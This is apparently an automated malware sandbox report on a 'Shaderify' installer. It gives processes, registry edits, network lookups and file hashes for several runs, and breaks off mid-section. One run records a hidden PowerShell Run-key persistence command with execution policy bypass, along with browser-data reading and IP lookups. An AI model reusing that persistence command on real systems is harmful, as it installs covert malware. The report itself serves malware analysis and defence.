rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=808 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | tcp | |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 220
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240419-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
119s
Max time network
145s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000985100581ca0144aa549c45968cf3753000000000200000000001066000000010000200000007be7a428456f8eae81e710f964e3a8492bc3a454f9b97f0cf4190dc7f43c44d2000000000e8000000002000020000000b1632f510a2633d30afdd323d6368e320d1498c13d5c4010196a21f48e53259590000000ac8011d2d1d19b32785a5add68d6b65f1e2d6ad90bf6485e61b18333268fba42b82757a86a92637304d7919f653ec37a656db78e520d410912721597a59bd55573f88bf914910ae396a0056d156e904e641b3d4308a0183071376ef938b5b47bc270262015f03a780f360868d394815fb1de212c72ea93eef4e4ad27c1cd5500df502ffd2e733353f10bc5fe373ce3f240000000544b6ac26b930588c3aa0dea05f78becca197db27da968c348751529733b76539e3087fe041c7092355c9e6218e50638cd9d15cd94a585de21348a9144f29dab | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{778934C1-218E-11EF-989B-729E5AF85804} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423569994" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000985100581ca0144aa549c45968cf3753000000000200000000001066000000010000200000006632754287c65a534fe9c789ed26e5b214c9d97d3b9d5e84e82c411370c89a80000000000e8000000002000020000000010db850348d8b803e5b549288f446fe623b655ae73a45ce4a485e4bd5b9654e20000000efdfae6d201f807aaf0774f7b570425906878177580fcb1cedf84f1b7755743840000000d1ab5e06245ccd1bcfff217b34e91abfab4248c211c22ef4c26f4f59df76b940807a977fb4118d7bc29e48db8e6a8d27ae7f2f26af9906cbabdbec307711577e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e011ad4c9bb5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2900 wrote to memory of 2920 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2900 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabD4AF.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarD5D0.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f3bd72df291282105c87b13173c81ca0 |
| SHA1 | ab9238ac4a1b39852ee1f45b91a3f012cf07d9b1 |
| SHA256 | 1d6d59db786ae096d3902542ede28a761cad18777e4e4e5a244d718f8a35b109 |
| SHA512 | 7f296d04f0156013b56d8ee1bc1432e3d4ba4c2120ad61ac2f840a4e1cc0973daf58fe4481e697f640c121361d2c7ca048976c6192aefa1e1af7291a287aa8f5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 97717d0de8650a603bdae5f158d39402 |
| SHA1 | b8a8acc684a6e10fd811f110c650cf5bd6832f18 |
| SHA256 | 2697ad24e47a89ccaaa343d32d2acef9b95462dda5f93e1c82697078c804ff66 |
| SHA512 | 45d03e9b5fa817415d02aaab2799ecc424b0f3818e5fdcec44518c77ebe3ea5fecb1f5e82e577e74f270480c7f2015e7de5b853536dda431a6929ff2272451bd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 012e6540fdc11b438acce8ee4def2fa3 |
| SHA1 | 4b00789a9671eddd911746673976c117d735bd07 |
| SHA256 | ccbd5c85b1ff95c7d8a8ae7f20ef8b86e398df72b3fa46590b455b72e24c31a0 |
| SHA512 | 3b54d174b271f0c1d05c7a1c72861edd683c4ef3259c9aaf7f876f83e2181a9b011791f718479ec775f77c1b2da5185081f0234ebeda90a6457dd7255f2ce241 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d4db13edcff887c98616588f56019056 |
| SHA1 | 49f06394fd409ec498534c75390056f7cb22ed15 |
| SHA256 | 5085c1ccf1089a314748278990c0c7a9a5e2bb3cd4942a383062f7d347ba7be1 |
| SHA512 | 9d3684d380b06119b460a7d0678fe49b4f56eb7a51b163b3c59c70979971ac4beaca2dde2f3939b23373ef5bb1ea6bdb42d304f1f48fed2aebaf00cb5920f609 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 491fc170b8a6f538a0c2eeb2a83165f3 |
| SHA1 | 06df7c2be0dcaf9ab339fe2b90e840ffd920d050 |
| SHA256 | 9910e1ba8994dbebbbf10ff22762f5969625e7aa60d1ed4c9216c29a89ad5a37 |
| SHA512 | 49d84d8158b47e510f7648311e847bcfbec5a7697d2a56695b6e2a182a3bea418f3e0b3d893e6cf260ce3e8388ea1bee5f284b54c1afb3c37b600c67cbcfb837 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 465b584a4603af5fdb782381e18e8ff5 |
| SHA1 | 79701cc458ad8291140eda9fb8ede6faa4136e29 |
| SHA256 | 9db08e97a35e27481fe532420066aeebc945ab8e7ae0f2c07d67fbb2a825ad0c |
| SHA512 | 91ddaf3bcb691959ec6f6068fbc12f9911fafe5f2dd7a8ea7cdf74731d30d5c836824ed5f7513f47837c51149b6973f022674ba7a793a2ddfbf63e993772635d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 896ef82fc3698e0a2ded88dc83adf642 |
| SHA1 | 7477583fd23b2fc015b1050965d1853c36aaaf02 |
| SHA256 | 4f3f1d931f9481b1463a15ad8834fbd2d1bedc7d6a1f5e1dc133eeaabb2906ba |
| SHA512 | bab594ce49aabdd395d633dd83171a124fe8a796f9dd71d871f16777b8837af8f9c5738a40d8d467350eae808756bb1266f1949fae677afc0621f1935e4803b8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2072fe2b0120ae2f527b0fe2a1e1539e |
| SHA1 | 00db9178049141ae4c426d359b8da3f3718378ee |
| SHA256 | 4a13ae32feda052f24f3eae9eed6d68f0f1550b16804c1419bc075b3bc947546 |
| SHA512 | bad3641f34bb38e9f7d0172c1895d9b4da447876f62e0866402b6b674fc3748c12aeaa30b5a16c960593021ba771c27e43f4ea7a6e53ef1abf8f6606eb0f5259 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2f57f647697f9b66b2c73114474ffe8 |
| SHA1 | 1fc8700bd248d2b49da9267cde43db7d090c6c5d |
| SHA256 | 0a7e45a1d14b5ff9df390e8f4f13d5106d2df08527a4ca78c1f0a7c52a1db3cf |
| SHA512 | 8a26465139233875aabdf05f4514825b3c8c5f436cd883a577b5d3a28e209fab34eedb0d9b1f0fa2e18632e5a46cef1712172aea4356f993b46116a1c31e7229 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 31dc51edafb8f88c062e0abfdc1473b9 |
| SHA1 | 25239888ef7dbe03bec2c86f7a4471042e117f8d |
| SHA256 | 086925dd5479e7a638cf6e50db89b919d1507f6716fa4a1f7cb6918192df6967 |
| SHA512 | 8cf31f803577a0fe59b35f2fbaa98e9b3072f63a5a03552849fcbbbe3cbaac5ad5394b290b3df62e7b73ddbf845290ea1b002164732a20cd1d163fc49617114e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c563bca91146ac2a02027fb735758107 |
| SHA1 | d467774e5548e5b267b494c3bcdeef8d23b52b11 |
| SHA256 | faebebf94a552a6bff0090c621605b6b96565453c27239ff00e0cf45d16e6799 |
| SHA512 | 9f21c2482c261b8b4177ecf2427767581278b12b7426221301b5302c39586d19d93613a9ae4ede610115a833ac37ffbb57ce93b73a2603943d1c005de47714c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 484317642050745f34c5047dc327c351 |
| SHA1 | 5803ce6d808bd154a809862149cae9880fe9c460 |
| SHA256 | d613fc4f59cbb389b38165aafcc1ed8ad457afad13e322e834ab712dae9c7a32 |
| SHA512 | fd065e6d12994aef37e05fe7b63e028b5737298f810f2a6bf921c44ebf034a0df9df0be8dd46678d5ba3765e8a11c4ff259b84769b699404b964533bb4bfb6b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | deaceed086a4762a423cd3c575a636f2 |
| SHA1 | 15d76daa76c4d441984e84bec8435dd0717df14c |
| SHA256 | 0c256efcac734bba35ef053bacd2795e9f1cc51cebe4f665a272e9d596b08e9d |
| SHA512 | c3997a274762cff8d333ed3b169f2eb5c5f031603f044173663fd1ac9f893e857397ecfd3d1d30ffdd6393aec4b5baa206cb5206e92033c4274f5c71b52ef897 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3fae89cb4c4fae7b53d7edd2f0435e9b |
| SHA1 | 3df2465f7d23f4814c43259336e26b4bf84631e8 |
| SHA256 | 6188fa5813c2cc1afb1415e50e4eb18f05ddbd8784765689d4d9a917d61ae40b |
| SHA512 | 6a9fe04df2c0090811ed720c53fe1bc4bfeebecab4b662ceea07ef0154f8884da6e30415f3d8139c9e856b35c91cf7f70553ec1ca4581120980e3f84c3488e0e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e057036ef9261e45d9f5988e834f043 |
| SHA1 | cf26d4ac8c6c16a6c5092668bf21ce3fbf6d3cf5 |
| SHA256 | 55ca8f4b8e8b3c190ed876d83bef5797e79697300ca2c50bf7327f88a0633c3b |
| SHA512 | 5099a67e80cc16306c72649a7234fd5e1d6e352a3c3822dc59a3bb6ae57aa5c82e9335f32a752d615b68357c85b9bb36442fa2c12ad43d3150688afc88f7611c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8ec93158e0eeed69810d592b18c864d8 |
| SHA1 | 72d08746f26b317382d0ee09529f4f7f042def5d |
| SHA256 | aab8fe1fb12e01af3a9502ce14626e29a4fba72dbfe8eb8c8edd3c8a5dc64a33 |
| SHA512 | 8da704fde44550d686e5871d69a1ef392c5a6874e312a3d00ee244b83f0b3d418fb03d9ee607cbb5104ce1230207d29f9c25967fac336a6b41fa8005d40ae10c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0258a3dc5a94e62d2ce404257923828b |
| SHA1 | 717edbba2928865483f66d4c5f2c0833cd3c0764 |
| SHA256 | 32e584e1db80d9477a8c15007a44eb10469d4f7428d8bd990ae55133f2a6f73e |
| SHA512 | 0d042559feb275379d02af1f1949c0d1f5bc739b5eb24ff2777ebed5e06e89d7d0646e2384857a068c0d2f91a0d7e3e16ef6edc637419952dc0706b56d67593c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e25a739842948c424a3eb9db1260265 |
| SHA1 | 801a0038d873a82b7fc6bed30e5304698e0a35c1 |
| SHA256 | 72ce27e90a551e42841289b3f0e8ddb85208c4828539a34fe38ce58194b541fb |
| SHA512 | 43f8ea2817882bf97df4075a5a03e159d9cac646dd78e34af424a3ce186bb8218412b99d9f29d4261df06e92648347eacd95b638e0472e801b751de7a6f9d8c6 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
118s
Max time network
125s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
150s
Max time network
121s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\QVPnzohsyxBSOWa.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
